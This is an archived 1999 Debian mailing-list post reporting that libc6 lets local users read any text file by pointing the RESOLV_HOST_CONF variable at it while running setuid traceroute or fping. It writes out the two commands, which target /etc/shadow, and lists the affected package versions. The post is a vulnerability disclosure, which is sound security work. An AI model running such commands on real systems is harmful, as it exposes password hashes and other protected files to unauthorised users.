libc6 vulnerability

To: debian-sparc@lists.debian.org
Subject: libc6 vulnerability
From: vojta@math.berkeley.edu (Paul Vojta)
Date: Sun, 7 Feb 1999 19:42:56 -0800
Message-id: <[🔎] 199902080342.TAA00948@tashkent.berkeley.edu>

Folks:

When checking the security of my system, I found that it is vulnerable
to the following standard attack (in tcsh syntax):

	env RESOLV_HOST_CONF=/etc/shadow /usr/sbin/traceroute foobar
  or	env RESOLV_HOST_CONF=/etc/shadow fping foobar

This allows the user to read any (text) file on the system.  My system
has:

	netstd	3.07-7.1
	libc6	2.0.105-1.2

In other words, it is up to date according to ftp.debian.org.

Curiously, my older 486 system at home is not vulnerable to these attacks.

--Paul Vojta, vojta@math.berkeley.edu

Reply to:

Follow-Ups:
- Re: libc6 vulnerability
  - From: Joel Klecker <jk@espy.org>

Prev by Date: how to know the real device used by /dev/console ?
Next by Date: Re: how to know the real device used by /dev/console ?
Previous by thread: Re: how to know the real device used by /dev/console ?
Next by thread: Re: libc6 vulnerability
Index(es):
- Date
- Thread